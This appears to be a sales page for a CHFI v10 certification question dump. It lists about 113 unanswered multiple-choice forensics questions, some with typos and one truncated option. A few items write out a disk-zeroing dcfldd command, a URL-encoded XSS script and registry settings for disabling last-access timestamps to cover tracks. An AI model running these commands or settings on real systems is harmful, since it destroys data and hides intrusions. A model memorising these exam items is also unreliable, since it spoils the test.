Pre-Winter Special - 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: c4sdisc65

312-49v10 PDF

$38.5

$109.99

3 Months Free Update

  • Printable Format
  • Value of Money
  • 100% Pass Assurance
  • Verified Answers
  • Researched by Industry Experts
  • Based on Real Exams Scenarios
  • 100% Real Questions

312-49v10 PDF + Testing Engine

$61.6

$175.99

3 Months Free Update

  • Exam Name: Computer Hacking Forensic Investigator (CHFI-v10)
  • Last Update: Oct 15, 2024
  • Questions and Answers: 704
  • Free Real Questions Demo
  • Recommended by Industry Experts
  • Best Economical Package
  • Immediate Access

312-49v10 Engine

$46.2

$131.99

3 Months Free Update

  • Best Testing Engine
  • One Click installation
  • Recommended by Teachers
  • Easy to use
  • 3 Modes of Learning
  • State of Art Technology
  • 100% Real Questions included

312-49v10 Practice Exam Questions with Answers Computer Hacking Forensic Investigator (CHFI-v10) Certification

Question # 6

Which of the following applications will allow a forensic investigator to track the user login sessions and user transactions that have occurred on an MS SQL Server?

A.

ApexSQL Audit

B.

netcat

C.

Notepad++

D.

Event Log Explorer

Full Access
Question # 7

What must an investigator do before disconnecting an iPod from any type of computer?

A.

Unmount the iPod

B.

Mount the iPod

C.

Disjoin the iPod

D.

Join the iPod

Full Access
Question # 8

Cylie is investigating a network breach at a state organization in Florida. She discovers that the intruders were able to gain access into the company firewalls by overloading them with IP packets. Cylie then discovers through her investigation that the intruders hacked into the company phone system and used the hard drives on their PBX system to store shared music files. What would this attack on the company PBX system be called?

A.

Phreaking

B.

Squatting

C.

Crunching

D.

Pretexting

Full Access
Question # 9

Which among the following is an act passed by the U.S. Congress in 2002 to protect investors from the possibility of fraudulent accounting activities by corporations?

A.

HIPAA

B.

GLBA

C.

SOX

D.

FISMA

Full Access
Question # 10

Which of the following are small pieces of data sent from a website and stored on the user’s computer by the user’s web browser to track, validate, and maintain specific user information?

A.

Temporary Files

B.

Open files

C.

Cookies

D.

Web Browser Cache

Full Access
Question # 11

Preparing an image drive to copy files to is the first step in Linux forensics. For this purpose, what would the following command accomplish?

dcfldd if=/dev/zero of=/dev/hda bs=4096 conv=noerror, sync

A.

Fill the disk with zeros

B.

Low-level format

C.

Fill the disk with 4096 zeros

D.

Copy files from the master disk to the slave disk on the secondary IDE controller

Full Access
Question # 12

What must an attorney do first before you are called to testify as an expert?

A.

Qualify you as an expert witness

B.

Read your curriculum vitae to the jury

C.

Engage in damage control

D.

Prove that the tools you used to conduct your examination are perfect

Full Access
Question # 13

What malware analysis operation can the investigator perform using the jv16 tool?

A.

Files and Folder Monitor

B.

Installation Monitor

C.

Network Traffic Monitoring/Analysis

D.

Registry Analysis/Monitoring

Full Access
Question # 14

Which of the following tools is not a data acquisition hardware tool?

A.

UltraKit

B.

Atola Insight Forensic

C.

F-Response Imager

D.

Triage-Responder

Full Access
Question # 15

Which of the following Perl scripts will help an investigator to access the executable image of a process?

A.

Lspd.pl

B.

Lpsi.pl

C.

Lspm.pl

D.

Lspi.pl

Full Access
Question # 16

What is the investigator trying to view by issuing the command displayed in the following screenshot?

312-49v10 question answer

A.

List of services stopped

B.

List of services closed recently

C.

List of services recently started

D.

List of services installed

Full Access
Question # 17

Which of the following registry hive gives the configuration information about which application was used to open various files on the system?

A.

HKEY_CLASSES_ROOT

B.

HKEY_CURRENT_CONFIG

C.

HKEY_LOCAL_MACHINE

D.

HKEY_USERS

Full Access
Question # 18

This type of testimony is presented by someone who does the actual fieldwork and does not offer a view in court.

A.

Civil litigation testimony

B.

Expert testimony

C.

Victim advocate testimony

D.

Technical testimony

Full Access
Question # 19

At what layer does a cross site scripting attack occur on?

A.

Presentation

B.

Application

C.

Session

D.

Data Link

Full Access
Question # 20

What encryption technology is used on Blackberry devices Password Keeper?

A.

3DES

B.

AES

C.

Blowfish

D.

RC5

Full Access
Question # 21

Jason discovered a file named $RIYG6VR.doc in the C:\$Recycle.Bin\\ while analyzing a hard disk image for the deleted data. What inferences can he make from the file name?

A.

It is a doc file deleted in seventh sequential order

B.

RIYG6VR.doc is the name of the doc file deleted from the system

C.

It is file deleted from R drive

D.

It is a deleted doc file

Full Access
Question # 22

What does 254 represent in ICCID 89254021520014515744?

A.

Industry Identifier Prefix

B.

Country Code

C.

Individual Account Identification Number

D.

Issuer Identifier Number

Full Access
Question # 23

Given the drive dimensions as follows and assuming a sector has 512 bytes, what is the capacity of the described hard drive?

22,164 cylinders/disk

80 heads/cylinder

63 sectors/track

A.

53.26 GB

B.

57.19 GB

C.

11.17 GB

D.

10 GB

Full Access
Question # 24

Which of the following file contains the traces of the applications installed, run, or uninstalled from a system?

A.

Shortcut Files

B.

Virtual files

C.

Prefetch Files

D.

Image Files

Full Access
Question # 25

A picture file is recovered from a computer under investigation. During the investigation process, the file is enlarged 500% to get a better view of its contents. The picture quality is not degraded at all from this process. What kind of picture is this file. What kind of picture is this file?

A.

Raster image

B.

Vector image

C.

Metafile image

D.

Catalog image

Full Access
Question # 26

When marking evidence that has been collected with the “aaa/ddmmyy/nnnn/zz” format, what does the “nnnn” denote?

A.

The initials of the forensics analyst

B.

The sequence number for the parts of the same exhibit

C.

The year he evidence was taken

D.

The sequential number of the exhibits seized by the analyst

Full Access
Question # 27

In Steganalysis, which of the following describes a Known-stego attack?

A.

The hidden message and the corresponding stego-image are known

B.

During the communication process, active attackers can change cover

C.

Original and stego-object are available and the steganography algorithm is known

D.

Only the steganography medium is available for analysis

Full Access
Question # 28

Which of the following statements is incorrect when preserving digital evidence?

A.

Verify if the monitor is in on, off, or in sleep mode

B.

Turn on the computer and extract Windows event viewer log files

C.

Remove the plug from the power router or modem

D.

Document the actions and changes that you observe in the monitor, computer, printer, or in other peripherals

Full Access
Question # 29

What is the purpose of using Obfuscator in malware?

A.

Execute malicious code in the system

B.

Avoid encryption while passing through a VPN

C.

Avoid detection by security mechanisms

D.

Propagate malware to other connected devices

Full Access
Question # 30

Fred, a cybercrime Investigator for the FBI, finished storing a solid-state drive In a static resistant bag and filled out the chain of custody form. Two days later. John grabbed the solid-state drive and created a clone of It (with write blockers enabled) In order to Investigate the drive. He did not document the chain of custody though. When John was finished, he put the solid-state drive back in the static resistant and placed it back in the evidence locker. A day later, the court trial began and upon presenting the evidence and the supporting documents, the chief Justice outright rejected them. Which of the following statements strongly support the reason for rejecting the evidence?

A.

Block clones cannot be created with solid-state drives

B.

Write blockers were used while cloning the evidence

C.

John did not document the chain of custody

D.

John investigated the clone instead of the original evidence itself

Full Access
Question # 31

Which of the following malware targets Android mobile devices and installs a backdoor that remotely installs applications from an attacker-controlled server?

A.

Felix

B.

XcodeGhost

C.

xHelper

D.

Unflod

Full Access
Question # 32

Randy has extracted data from an old version of a Windows-based system and discovered info file Dc5.txt in the system recycle bin. What does the file name denote?

A.

A text file deleted from C drive in sixth sequential order

B.

A text file deleted from C drive in fifth sequential order

C.

A text file copied from D drive to C drive in fifth sequential order

D.

A text file copied from C drive to D drive in fifth sequential order

Full Access
Question # 33

Travis, a computer forensics investigator, is finishing up a case he has been working on for over a month involving copyright infringement and embezzlement. His last task is to prepare an investigative report for the president of the company he has been working for. Travis must submit a hard copy and an electronic copy to this president. In what electronic format should Travis send this report?

A.

TIFF-8

B.

DOC

C.

WPD

D.

PDF

Full Access
Question # 34

In the following email header, where did the email first originate from?

312-49v10 question answer

A.

Somedomain.com

B.

Smtp1.somedomain.com

C.

Simon1.state.ok.gov.us

D.

David1.state.ok.gov.us

Full Access
Question # 35

Why is it still possible to recover files that have been emptied from the Recycle Bin on a Windows computer?

A.

The data is still present until the original location of the file is used

B.

The data is moved to the Restore directory and is kept there indefinitely

C.

The data will reside in the L2 cache on a Windows computer until it is manually deleted

D.

It is not possible to recover data that has been emptied from the Recycle Bin

Full Access
Question # 36

In handling computer-related incidents, which IT role should be responsible for recovery, containment, and prevention to constituents?

A.

Security Administrator

B.

Network Administrator

C.

Director of Information Technology

D.

Director of Administration

Full Access
Question # 37

Brian has the job of analyzing malware for a software security company. Brian has setup a virtual environment that includes virtual machines running various versions of OSes. Additionally, Brian has setup separated virtual networks within this environment The virtual environment does not connect to the company's intranet nor does it connect to the external Internet. With everything setup, Brian now received an executable file from client that has undergone a cyberattack. Brian ran the executable file In the virtual environment to see what it would do. What type of analysis did Brian perform?

A.

Static malware analysis

B.

Status malware analysis

C.

Dynamic malware analysis

D.

Static OS analysis

Full Access
Question # 38

Which of the following file formats allows the user to compress the acquired data as well as keep it randomly accessible?

A.

Proprietary Format

B.

Generic Forensic Zip (gfzip)

C.

Advanced Forensic Framework 4

D.

Advanced Forensics Format (AFF)

Full Access
Question # 39

Which of the following statements is true regarding SMTP Server?

A.

SMTP Server breaks the recipient’s address into Recipient’s name and his/her designation before passing it to the DNS Server

B.

SMTP Server breaks the recipient's address into Recipient’s name and recipient’s address before passing it to the DNS Server

C.

SMTP Server breaks the recipient’s address into Recipient’s name and domain name before passing it to the DNS Server

D.

SMTP Server breaks the recipient’s address into Recipient’s name and his/her initial before passing it to the DNS Server

Full Access
Question # 40

Donald made an OS disk snapshot of a compromised Azure VM under a resource group being used by the affected company as a part of forensic analysis process. He then created a vhd file out of the snapshot and stored it in a file share and as a page blob as backup in a storage account under different region. What Is the next thing he should do as a security measure?

A.

Recommend changing the access policies followed by the company

B.

Delete the snapshot from the source resource group

C.

Delete the OS disk of the affected VM altogether

D.

Create another VM by using the snapshot

Full Access
Question # 41

Which of the following web browser uses the Extensible Storage Engine (ESE) database format to store browsing records, including history, cache, and cookies?

A.

Safari

B.

Mozilla Firefox

C.

Microsoft Edge

D.

Google Chrome

Full Access
Question # 42

Which of the following files gives information about the client sync sessions in Google Drive on Windows?

A.

sync_log.log

B.

Sync_log.log

C.

sync.log

D.

Sync.log

Full Access
Question # 43

Which of the following reports are delivered under oath to a board of directors/managers/panel of the jury?

A.

Written Formal Report

B.

Verbal Formal Report

C.

Verbal Informal Report

D.

Written Informal Report

Full Access
Question # 44

To which phase of the Computer Forensics Investigation Process does the Planning and Budgeting of a Forensics Lab belong?

A.

Post-investigation Phase

B.

Reporting Phase

C.

Pre-investigation Phase

D.

Investigation Phase

Full Access
Question # 45

Which of the following tool can the investigator use to analyze the network to detect Trojan activities?

A.

Regshot

B.

TRIPWIRE

C.

RAM Computer

D.

Capsa

Full Access
Question # 46

Paul is a computer forensics investigator working for Tyler & Company Consultants. Paul has been called upon to help investigate a computer hacking ring broken up by the local police. Paul begins to inventory the PCs found in the hackers hideout. Paul then comes across a PDA left by them that is attached to a number of different peripheral devices. What is the first step that Paul must take with the PDA to ensure the integrity of the investigation?

A.

Place PDA, including all devices, in an antistatic bag

B.

Unplug all connected devices

C.

Power off all devices if currently on

D.

Photograph and document the peripheral devices

Full Access
Question # 47

%3cscript%3ealert(”XXXXXXXX”)%3c/script%3e is a script obtained from a Cross-Site Scripting attack. What type of encoding has the attacker employed?

A.

Double encoding

B.

Hex encoding

C.

Unicode

D.

Base64

Full Access
Question # 48

Sally accessed the computer system that holds trade secrets of the company where she Is employed. She knows she accessed It without authorization and all access (authorized and unauthorized) to this computer Is monitored.To cover her tracks. Sally deleted the log entries on this computer. What among the following best describes her action?

A.

Password sniffing

B.

Anti-forensics

C.

Brute-force attack

D.

Network intrusion

Full Access
Question # 49

An International Mobile Equipment Identifier (IMEI) is a 15-digit number that indicates the manufacturer, model type, and country of approval for GSM devices. The first eight digits of an IMEI number that provide information about the model and origin of the mobile device is also known as:

A.

Type Allocation Code (TAC)

B.

Integrated Circuit Code (ICC)

C.

Manufacturer Identification Code (MIC)

D.

Device Origin Code (DOC)

Full Access
Question # 50

Which of the following is a non-zero data that an application allocates on a hard disk cluster in systems running on Windows OS?

A.

Sparse File

B.

Master File Table

C.

Meta Block Group

D.

Slack Space

Full Access
Question # 51

An attacker successfully gained access to a remote Windows system and plans to install persistent backdoors on it. Before that, to avoid getting detected in future, he wants to cover his tracks by disabling the last-accessed timestamps of the machine. What would he do to achieve this?

A.

Set the registry value of HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate to 0

B.

Run the command fsutil behavior set disablelastaccess 0

C.

Set the registry value of HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate to 1

D.

Run the command fsutil behavior set enablelastaccess 0

Full Access
Question # 52

Data Files contain Multiple Data Pages, which are further divided into Page Header, Data Rows, and Offset Table. Which of the following is true for Data Rows?

A.

Data Rows store the actual data

B.

Data Rows present Page type. Page ID, and so on

C.

Data Rows point to the location of actual data

D.

Data Rows spreads data across multiple databases

Full Access
Question # 53

Consider that you are investigating a machine running an Windows OS released prior to Windows Vista. You are trying to gather information about the deleted files by examining the master database file named INFO2 located at C:\Recycler\\. You read an entry named "Dd5.exe". What does Dd5.exe mean?

A.

D drive. fifth file deleted, a .exe file

B.

D drive, fourth file restored, a .exe file

C.

D drive, fourth file deleted, a .exe file

D.

D drive, sixth file deleted, a .exe file

Full Access
Question # 54

What happens lo the header of the file once It Is deleted from the Windows OS file systems?

A.

The OS replaces the first letter of a deleted file name with a hex byte code: E5h

B.

The OS replaces the entire hex byte coding of the file.

C.

The hex byte coding of the file remains the same, but the file location differs

D.

The OS replaces the second letter of a deleted file name with a hex byte code: Eh5

Full Access
Question # 55

What command-line tool enables forensic Investigator to establish communication between an Android device and a forensic workstation in order to perform data acquisition from the device?

A.

APK Analyzer

B.

SDK Manager

C.

Android Debug Bridge

D.

Xcode

Full Access
Question # 56

Which following forensic tool allows investigator to detect and extract hidden streams on NTFS drive?

A.

Stream Detector

B.

TimeStomp

C.

Autopsy

D.

analyzeMFT

Full Access
Question # 57

Which of the following is a precomputed table containing word lists like dictionary files and brute force lists and their hash values?

A.

Directory Table

B.

Rainbow Table

C.

Master file Table (MFT)

D.

Partition Table

Full Access
Question # 58

In Windows, prefetching is done to improve system performance. There are two types of prefetching: boot prefetching and application prefetching. During boot prefetching, what does the Cache Manager do?

A.

Determines the data associated with value EnablePrefetcher

B.

Monitors the first 10 seconds after the process is started

C.

Checks whether the data is processed

D.

Checks hard page faults and soft page faults

Full Access
Question # 59

The information security manager at a national legal firm has received several alerts from the intrusion detection system that a known attack signature was detected against the organization's file server. What should the information security manager do first?

A.

Report the incident to senior management

B.

Update the anti-virus definitions on the file server

C.

Disconnect the file server from the network

D.

Manually investigate to verify that an incident has occurred

Full Access
Question # 60

Sniffers that place NICs in promiscuous mode work at what layer of the OSI model?

A.

Network

B.

Transport

C.

Physical

D.

Data Link

Full Access
Question # 61

What is the location of the binary files required for the functioning of the OS in a Linux system?

A.

/run

B.

/bin

C.

/root

D.

/sbin

Full Access
Question # 62

Netstat is a tool for collecting information regarding network connections. It provides a simple view of TCP and UDP connections, and their state and network traffic statistics. Which of the following commands shows you the TCP and UDP network connections, listening ports, and the identifiers?

A.

netstat – r

B.

netstat – ano

C.

netstat – b

D.

netstat – s

Full Access
Question # 63

What is the slave device connected to the secondary IDE controller on a Linux OS referred to?

A.

hda

B.

hdd

C.

hdb

D.

hdc

Full Access
Question # 64

UEFI is a specification that defines a software interface between an OS and platform firmware. Where does this interface store information about files present on a disk?

A.

BIOS-MBR

B.

GUID Partition Table (GPT)

C.

Master Boot Record (MBR)

D.

BIOS Parameter Block

Full Access
Question # 65

James, a hacker, identifies a vulnerability in a website. To exploit the vulnerability, he visits the login page and notes down the session ID that is created. He appends this session ID to the login URL and shares the link with a victim. Once the victim logs into the website using the shared URL, James reloads the webpage (containing the URL with the session ID appended) and now, he can browse the active session of the victim. Which attack did James successfully execute?

A.

Cross Site Request Forgery

B.

Cookie Tampering

C.

Parameter Tampering

D.

Session Fixation Attack

Full Access
Question # 66

Adam, a forensic analyst, is preparing VMs for analyzing a malware. Which of the following is NOT a best practice?

A.

Isolating the host device

B.

Installing malware analysis tools

C.

Using network simulation tools

D.

Enabling shared folders

Full Access
Question # 67

Richard is extracting volatile data from a system and uses the command doskey/history. What is he trying to extract?

A.

Events history

B.

Previously typed commands

C.

History of the browser

D.

Passwords used across the system

Full Access
Question # 68

Harold is a computer forensics investigator working for a consulting firm out of Atlanta Georgia. Harold is called upon to help with a corporate espionage case in Miami Florida. Harold assists in the investigation by pulling all the data from the computers allegedly used in the illegal activities. He finds that two suspects in the company where stealing sensitive corporate information and selling it to competing companies. From the email and instant messenger logs recovered, Harold has discovered that the two employees notified the buyers by writing symbols on the back of specific stop signs. This way, the buyers knew when and where to meet with the alleged suspects to buy the stolen material. What type of steganography did these two suspects use?

A.

Text semagram

B.

Visual semagram

C.

Grill cipher

D.

Visual cipher

Full Access
Question # 69

Which of the following refers to the process of the witness being questioned by the attorney who called the latter to the stand?

A.

Witness Authentication

B.

Direct Examination

C.

Expert Witness

D.

Cross Questioning

Full Access
Question # 70

How will you categorize a cybercrime that took place within a CSP’s cloud environment?

A.

Cloud as a Subject

B.

Cloud as a Tool

C.

Cloud as an Audit

D.

Cloud as an Object

Full Access
Question # 71

What file is processed at the end of a Windows XP boot to initialize the logon dialog box?

A.

NTOSKRNL.EXE

B.

NTLDR

C.

LSASS.EXE

D.

NTDETECT.COM

Full Access
Question # 72

Consider a scenario where the perpetrator of a dark web crime has unlnstalled Tor browser from their computer after committing the crime. The computer has been seized by law enforcement so they can Investigate It for artifacts of Tor browser usage. Which of the following should the Investigators examine to establish the use of Tor browser on the suspect machine?

A.

Swap files

B.

Files in Recycle Bin

C.

Security logs

D.

Prefetch files

Full Access
Question # 73

Which set of anti-forensic tools/techniques allows a program to compress and/or encrypt an executable file to hide attack tools from being detected by reverse-engineering or scanning?

A.

Packers

B.

Emulators

C.

Password crackers

D.

Botnets

Full Access
Question # 74

An EC2 instance storing critical data of a company got infected with malware. The forensics team took the EBS volume snapshot of the affected Instance to perform further analysis and collected other data of evidentiary value. What should be their next step?

A.

They should pause the running instance

B.

They should keep the instance running as it stores critical data

C.

They should terminate all instances connected via the same VPC

D.

They should terminate the instance after taking necessary backup

Full Access
Question # 75

Which Federal Rule of Evidence speaks about the Hearsay exception where the availability of the declarant Is immaterial and certain characteristics of the declarant such as present sense Impression, excited utterance, and recorded recollection are also observed while giving their testimony?

A.

Rule 801

B.

Rule 802

C.

Rule 804

D.

Rule 803

Full Access
Question # 76

You are an information security analyst at a large pharmaceutical company. While performing a routine review of audit logs, you have noticed a significant amount of egress traffic to various IP addresses on destination port 22 during off-peak hours. You researched some of the IP addresses and found that many of them are in Eastern Europe. What is the most likely cause of this traffic?

A.

Malicious software on internal system is downloading research data from partner 5FTP servers in Eastern Europe

B.

Internal systems are downloading automatic Windows updates

C.

Data is being exfiltrated by an advanced persistent threat (APT)

D.

The organization's primary internal DNS server has been compromised and is performing DNS zone transfers to malicious external entities

Full Access
Question # 77

Which of the following Windows event logs record events related to device drives and hardware changes?

A.

Forwarded events log

B.

System log

C.

Application log

D.

Security log

Full Access
Question # 78

During an Investigation, the first responders stored mobile devices In specific containers to provide network Isolation. All the following are examples of such pieces of equipment, except for:

A.

Wireless StrongHold bag

B.

VirtualBox

C.

Faraday bag

D.

RF shield box

Full Access
Question # 79

Frank, a cloud administrator in his company, needs to take backup of the OS disks of two Azure VMs that store business-critical data. Which type of Azure blob storage can he use for this purpose?

A.

Append blob

B.

Medium blob

C.

Block blob

D.

Page blob

Full Access
Question # 80

Jack is reviewing file headers to verify the file format and hopefully find more Information of the file. After a careful review of the data chunks through a hex editor; Jack finds the binary value Oxffd8ff. Based on the above Information, what type of format is the file/image saved as?

A.

BMP

B.

GIF

C.

ASCII

D.

JPEG

Full Access
Question # 81

James, a forensics specialist, was tasked with investigating a Windows XP machine that was used for malicious online activities. During the Investigation, he recovered certain deleted files from Recycle Bin to Identify attack clues.

Identify the location of Recycle Bin in Windows XP system.

A.

Drive:\$Recycle.Bin\

B.

Iocal/sha re/Trash

C.

Drive:\RECYCLER\

D.

DriveARECYCLED

Full Access
Question # 82

Which network attack is described by the following statement?

“At least five Russian major banks came under a continuous hacker attack, although online client services were not disrupted. The attack came from a wide-scale botnet involving at least 24,000 computers, located in 30 countries.”

A.

DDoS

B.

Sniffer Attack

C.

Buffer Overflow

D.

Man-in-the-Middle Attack

Full Access
Question # 83

An investigator is searching through the firewall logs of a company and notices ICMP packets that are larger than 65,536 bytes. What type of activity is the investigator seeing?

A.

Smurf

B.

Ping of death

C.

Fraggle

D.

Nmap scan

Full Access
Question # 84

Pagefile.sys is a virtual memory file used to expand the physical memory of a computer. Select the registry path for the page file:

A.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

B.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\System Management

C.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Device Management

D.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters

Full Access
Question # 85

What does the 63.78.199.4(161) denotes in a Cisco router log?

Mar 14 22:57:53.425 EST: %SEC-6-IPACCESSLOGP: list internet-inbound denied udp 66.56.16.77(1029) -> 63.78.199.4(161), 1 packet

A.

Destination IP address

B.

Source IP address

C.

Login IP address

D.

None of the above

Full Access
Question # 86

Microsoft Security IDs are available in Windows Registry Editor. The path to locate IDs in Windows 7 is:

A.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList

B.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProfileList

C.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegList

D.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Regedit

Full Access
Question # 87

Steven has been given the task of designing a computer forensics lab for the company he works for. He has found documentation on all aspects of how to design a lab except the number of exits needed. How many exits should Steven include in his design for the computer forensics lab?

A.

Three

B.

One

C.

Two

D.

Four

Full Access
Question # 88

When making the preliminary investigations in a sexual harassment case, how many investigators are you recommended having?

A.

One

B.

Two

C.

Three

D.

Four

Full Access
Question # 89

Buffer overflow vulnerabilities, of web applications, occurs when the application fails to guard its buffer properly and allows writing beyond its maximum size. Thus, it overwrites the _________. There are multiple forms of buffer overflow, including a Heap Buffer Overflow and a Format String Attack.

A.

Adjacent buffer locations

B.

Adjacent string locations

C.

Adjacent bit blocks

D.

Adjacent memory locations

Full Access
Question # 90

Jim’s company regularly performs backups of their critical servers. But the company can’t afford to send backup tapes to an off-site vendor for long term storage and archiving. Instead Jim’s company keeps the backup tapes in a safe in the office. Jim’s company is audited each year, and the results from this year’s audit show a risk because backup tapes aren’t stored off-site. The Manager of Information Technology has a plan to take the backup tapes home with him and wants to know what two things he can do to secure the backup tapes while in transit?

A.

Encrypt the backup tapes and use a courier to transport them.

B.

Encrypt the backup tapes and transport them in a lock box

C.

Degauss the backup tapes and transport them in a lock box.

D.

Hash the backup tapes and transport them in a lock box.

Full Access
Question # 91

In which implementation of RAID will the image of a Hardware RAID volume be different from the image taken separately from the disks?

A.

RAID 1

B.

The images will always be identical because data is mirrored for redundancy

C.

RAID 0

D.

It will always be different

Full Access
Question # 92

After suspecting a change in MS-Exchange Server storage archive, the investigator has analyzed it. Which of the following components is not an actual part of the archive?

A.

PRIV.STM

B.

PUB.EDB

C.

PRIV.EDB

D.

PUB.STM

Full Access
Question # 93

Which of these ISO standards define the file system for optical storage media, such as CD-ROM and DVD-ROM?

A.

ISO 9660

B.

ISO 13346

C.

ISO 9960

D.

ISO 13490

Full Access
Question # 94

Which of the following setups should a tester choose to analyze malware behavior?

A.

A virtual system with internet connection

B.

A normal system without internet connect

C.

A normal system with internet connection

D.

A virtual system with network simulation for internet connection

Full Access
Question # 95

Hard disk data addressing is a method of allotting addresses to each _______ of data on a hard disk.

A.

Physical block

B.

Operating system block

C.

Hard disk block

D.

Logical block

Full Access
Question # 96

What is the name of the first reserved sector in File allocation table?

A.

Volume Boot Record

B.

Partition Boot Sector

C.

Master Boot Record

D.

BIOS Parameter Block

Full Access
Question # 97

What is the role of Alloc.c in Apache core?

A.

It handles allocation of resource pools

B.

It is useful for reading and handling of the configuration files

C.

It takes care of all the data exchange and socket connections between the client and the server

D.

It handles server start-ups and timeouts

Full Access
Question # 98

Which list contains the most recent actions performed by a Windows User?

A.

MRU

B.

Activity

C.

Recents

D.

Windows Error Log

Full Access
Question # 99

The working of the Tor browser is based on which of the following concepts?

A.

Both static and default routing

B.

Default routing

C.

Static routing

D.

Onion routing

Full Access
Question # 100

Which of the following is the most effective tool for acquiring volatile data from a Windows-based system?

A.

Coreography

B.

Datagrab

C.

Ethereal

D.

Helix

Full Access
Question # 101

Which one of the following is not a first response procedure?

A.

Preserve volatile data

B.

Fill forms

C.

Crack passwords

D.

Take photos

Full Access
Question # 102

An investigator wants to extract passwords from SAM and System Files. Which tool can the Investigator use to obtain a list of users, passwords, and their hashes In this case?

A.

PWdump7

B.

HashKey

C.

Nuix

D.

FileMerlin

Full Access
Question # 103

Which of the following statements pertaining to First Response is true?

A.

First Response is a part of the investigation phase

B.

First Response is a part of the post-investigation phase

C.

First Response is a part of the pre-investigation phase

D.

First Response is neither a part of pre-investigation phase nor a part of investigation phase. It only involves attending to a crime scene first and taking measures that assist forensic investigators in executing their tasks in the investigation phase more efficiently

Full Access
Question # 104

Maria has executed a suspicious executable file In a controlled environment and wants to see if the file adds/modifies any registry value after execution via Windows Event Viewer. Which of the following event ID should she look for In this scenario?

A.

Event ID 4657

B.

Event ID 4624

C.

Event ID 4688

D.

Event ID 7040

Full Access
Question # 105

Assume there Is a file named myflle.txt In C: drive that contains hidden data streams. Which of the following commands would you Issue to display the contents of a data stream?

A.

echo text > program: source_file

B.

myfile.dat: st ream 1

C.

C:\MORE < myfile.txt:siream1

D.

C:\>ECHO text_message > myfile.txt:stream1

Full Access
Question # 106

Data density of a disk drive is calculated by using_______

A.

Slack space, bit density, and slack density.

B.

Track space, bit area, and slack space.

C.

Track density, areal density, and slack density.

D.

Track density, areal density, and bit density.

Full Access
Question # 107

Steve received a mail that seemed to have come from her bank. The mail has instructions for Steve to click on a link and provide information to avoid the suspension of her account. The link in the mail redirected her to a form asking for details such as name, phone number, date of birth, credit card number or PIN, CW code, SNNs, and email address. On a closer look, Steve realized that the URL of the form in not the same as that of her bank's. Identify the type of external attack performed by the attacker In the above scenario?

A.

Aphishing

B.

Espionage

C.

Taiigating

D.

Brute-force

Full Access
Question # 108

Chloe is a forensic examiner who is currently cracking hashed passwords for a crucial mission and hopefully solve the case. She is using a lookup table used for recovering a plain text password from cipher text; it contains word list and brute-force list along with their computed hash values. Chloe Is also using a graphical generator that supports SHA1.

a. What password technique is being used?

b. What tool is Chloe using?

A.

Dictionary attack b. Cisco PIX

B.

Cain & Able b. Rten

C.

Brute-force b. MScache

D.

Rainbow Tables b. Winrtgen

Full Access
Question # 109

A computer forensics Investigator or forensic analyst Is a specially trained professional who works with law enforcement as well as private businesses to retrieve Information from computers and other types of data storage devices. For this, the analyst should have an excellent working knowledge of all aspects of the computer. Which of the following is not a duty of the analyst during a criminal investigation?

A.

To create an investigation report

B.

To fill the chain of custody

C.

To recover data from suspect devices

D.

To enforce the security of all devices and software in the scene

Full Access
Question # 110

Edgar is part of the FBI's forensic media and malware analysis team; he Is analyzing a current malware and Is conducting a thorough examination of the suspect system, network, and other connected devices. Edgar's approach Is to execute the malware code to know how It Interacts with the host system and Its Impacts on It. He is also using a virtual machine and a sandbox environment.

What type of malware analysis is Edgar performing?

A.

Malware disassembly

B.

VirusTotal analysis

C.

Static analysis

D.

Dynamic malware analysis/behavioral analysis

Full Access
Question # 111

Which of the following methods of mobile device data acquisition captures all the data present on the device, as well as all deleted data and access to unallocated space?

A.

Manual acquisition

B.

Logical acquisition

C.

Direct acquisition

D.

Physical acquisition

Full Access
Question # 112

Ronald, a forensic investigator, has been hired by a financial services organization to Investigate an attack on their MySQL database server, which Is hosted on a Windows machine named WIN-DTRAI83202X. Ronald wants to retrieve information on the changes that have been made to the database. Which of the following files should Ronald examine for this task?

A.

relay-log.info

B.

WIN-DTRAl83202Xrelay-bin.index

C.

WIN-DTRAI83202Xslow.log

D.

WIN-DTRAI83202X-bin.nnnnnn

Full Access
Question # 113

Which of the following statements is true with respect to SSDs (solid-state drives)?

A.

Like HDDs. SSDs also have moving parts

B.

SSDs cannot store non-volatile data

C.

SSDs contain tracks, clusters, and sectors to store data

D.

Faster data access, lower power usage, and higher reliability are some of the m

Full Access
Question # 114

You are a forensic investigator who is analyzing a hard drive that was recently collected as evidence. You have been unsuccessful at locating any meaningful evidence within the file system and suspect a drive wiping utility may have been used. You have reviewed the keys within the software hive of the Windows registry and did not find any drive wiping utilities. How can you verify that drive wiping software was used on the hard drive?

A.

Document in your report that you suspect a drive wiping utility was used, but no evidence was found

B.

Check the list of installed programs

C.

Load various drive wiping utilities offline, and export previous run reports

D.

Look for distinct repeating patterns on the hard drive at the bit level

Full Access
Question # 115

When Investigating a system, the forensics analyst discovers that malicious scripts were Injected Into benign and trusted websites. The attacker used a web application to send malicious code. In the form of a browser side script, to a different end-user. What attack was performed here?

A.

Brute-force attack

B.

Cookie poisoning attack

C.

Cross-site scripting attack

D.

SQL injection attack

Full Access
Question # 116

For the purpose of preserving the evidentiary chain of custody, which of the following labels is not appropriate?

A.

Relevant circumstances surrounding the collection

B.

General description of the evidence

C.

Exact location the evidence was collected from

D.

SSN of the person collecting the evidence

Full Access
Question # 117

What is the extension used by Windows OS for shortcut files present on the machine?

A.

.log

B.

.pf

C.

.lnk

D.

.dat

Full Access
Question # 118

Storage location of Recycle Bin for NTFS file systems (Windows Vista and later) is located at:

A.

Drive:\$ Recycle. Bin

B.

DriveARECYClE.BIN

C.

Drive:\RECYCLER

D.

Drive:\REYCLED

Full Access
Question # 119

